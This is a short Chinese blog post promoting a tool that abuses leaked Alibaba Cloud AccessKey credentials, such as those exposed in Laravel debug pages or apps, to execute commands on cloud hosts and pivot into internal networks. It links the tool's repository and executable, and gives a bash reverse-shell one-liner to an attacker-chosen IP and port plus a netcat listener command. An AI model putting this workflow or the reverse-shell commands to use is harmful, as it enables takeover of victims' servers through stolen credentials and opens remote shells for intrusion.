【推荐】阿里云主机accesskey利用工具

1、简介

在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET(阿里云API key),特别是laravel框架得debug信息。APP中也会泄露这些信息.通过这款利用工具我们可以进行命令执行获取到shell然后进行内网渗透。

具体的github地址如下:

https://github.com/mrknow001/aliyun-accesskey-Tools

exe文件下载地址:

https://github.com/mrknow001/aliyun-accesskey-Tools/releases/download/1.0/Aliyun-.AK.Tools.exe

 

工具截图如下:

 

【推荐】阿里云主机accesskey利用工具_第1张图片

可在命令输入处输入反弹shell的代码。

bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1

 

自己的机器执行:

nc -lvvp 端口  

你可能感兴趣的:(工具小tip)